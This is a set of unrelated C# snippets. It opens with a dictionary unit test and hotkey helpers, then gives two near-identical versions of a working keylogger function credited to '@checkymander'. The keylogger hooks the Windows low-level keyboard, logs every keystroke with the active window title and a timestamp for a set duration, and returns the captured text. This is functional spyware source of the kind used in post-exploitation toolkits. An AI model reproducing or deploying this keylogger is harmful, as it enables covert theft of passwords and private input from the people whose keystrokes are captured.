public void AddRetrieveIndexer() { KeyDict <KeyDictItem, string> keyDict = new KeyDict <KeyDictItem, string>(_getKeyFunc); KeyDictItem kdiAdded = new KeyDictItem() { Key = "uno", Val = "UNO" }; keyDict["uno"] = kdiAdded; KeyDictItem kdiRetrieved = keyDict["uno"]; kdiRetrieved.Should().Be(kdiAdded); }
public static void RegisterKey(string Key) { if (!KeyDict.ContainsKey(Key)) { throw new Exception(); } if (Registered) { UnregisterKey(hWnd); } int x = 0; KeyValue = KeyDict[Key]; x = RegisterHotKey(hWnd, KeyId, 0, KeyValue); Registered = true; }
public static bool IsPressing(KeyDict key) { bool pressing = true; bool IsAlt = key == KeyDict.Alt || key == KeyDict.CtrlAlt; bool IsCtrl = key == KeyDict.Ctrl || key == KeyDict.CtrlAlt; if (IsAlt && !GetAsyncKeyState(VK.ALT)) { pressing = false; } if (IsCtrl && !GetAsyncKeyState(VK.CONTROL)) { pressing = false; } return(pressing); }
/// <summary> /// Starts the Keylogger /// </summary> /// <author>Scottie Austin (@checkymander)</author> /// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns> /// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param> public static string StartKeylogger(int Seconds) { StringBuilder Builder = new StringBuilder(); Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds)); IntPtr HookID = IntPtr.Zero; string PreviousActiveWindow = ""; HookProc = (nCode, wParam, lParam) => { try { var CurrentActiveWindow = GetActiveWindowTitle(); if (CurrentActiveWindow != PreviousActiveWindow) { Builder.Append("\r\n"); PreviousActiveWindow = CurrentActiveWindow; Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n"); } if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN) { KbDllHookStruct kbHookStruct = (KbDllHookStruct)Marshal.PtrToStructure(lParam, typeof(KbDllHookStruct)); int vkCode = kbHookStruct.VirtualKeyCode; bool shifted = PInvoke.Win32.User32.GetKeyState(160) < 0 || PInvoke.Win32.User32.GetKeyState(161) < 0; Keys keycode = (Keys)vkCode; if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append)) { bool capped = PInvoke.Win32.User32.GetKeyState(20) != 0; if ((capped && shifted) || !(capped || shifted)) { append = keycode.ToString().ToLower(); } else { append = keycode.ToString().ToUpper(); } } if (vkCode == 231) { append = ((char)kbHookStruct.ScanCode).ToString(); } Builder.Append(append); } } catch (Exception e) { Console.Error.WriteLine("Keylogger Exception - " + e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace); } return(PInvoke.Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam)); }; HookID = PInvoke.Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, HookProc, PInvoke.Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0); if (Seconds <= 0) { Forms.Application.Run(); return(""); } else { using (Timer timer = new Timer(Seconds * 1000)) { timer.Elapsed += (source, e) => { Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now)); PInvoke.Win32.User32.UnhookWindowsHookEx(HookID); timer.Stop(); Forms.Application.Exit(); }; timer.Start(); Forms.Application.Run(); return(Builder.ToString()); } } }
/// <summary> /// Starts the Keylogger /// </summary> /// <author>Scottie Austin (@checkymander)</author> /// <returns>String containing the captured keystrokes, along with identification of what window they were entered in.</returns> /// <param name="Seconds">The amount of time in seconds the keylogger should run for before returning keystrokes.</param> public static string StartKeylogger(int Seconds) { StringBuilder Builder = new StringBuilder(); Builder.Append(String.Format("Starting keylogger for {0} seconds.", Seconds)); IntPtr HookID = IntPtr.Zero; string PreviousActiveWindow = ""; Win32.User32.HookProc hookproc = (nCode, wParam, lParam) => { var CurrentActiveWindow = GetActiveWindowTitle(); if (CurrentActiveWindow != PreviousActiveWindow) { Builder.Append("\r\n"); PreviousActiveWindow = CurrentActiveWindow; Builder.Append("\r\n" + DateTime.Now + "\r\n" + CurrentActiveWindow + "\r\n--------------------------\r\n"); } if (nCode >= 0 && wParam == (IntPtr)Win32.User32.WM_KEYDOWN) { int vkCode = Marshal.ReadInt32(lParam); bool shifted = Win32.User32.GetKeyState(160) < 0 || Win32.User32.GetKeyState(161) < 0; Keys keycode = (Keys)vkCode; if (!(shifted && KeyDictShift.TryGetValue(keycode, out string append)) && !KeyDict.TryGetValue(keycode, out append)) { bool capped = Win32.User32.GetKeyState(20) != 0; if ((capped && shifted) || !(capped || shifted)) { append = keycode.ToString().ToLower(); } else { append = keycode.ToString().ToUpper(); } } Builder.Append(append); } return(Win32.User32.CallNextHookEx(HookID, nCode, wParam, lParam)); }; HookID = Win32.User32.SetWindowsHookEx(Win32.User32.WH_KEYBOARD_LL, hookproc, Win32.Kernel32.GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName), 0); using (Timer timer = new Timer(Seconds * 1000)) { timer.Elapsed += (source, e) => { Builder.AppendLine(String.Format("\r\n\r\nFinished Keylogger at {0:HH:mm:ss.fff}", DateTime.Now)); Win32.User32.UnhookWindowsHookEx(HookID); timer.Stop(); Forms.Application.Exit(); }; timer.Start(); Forms.Application.Run(); return(Builder.ToString()); } }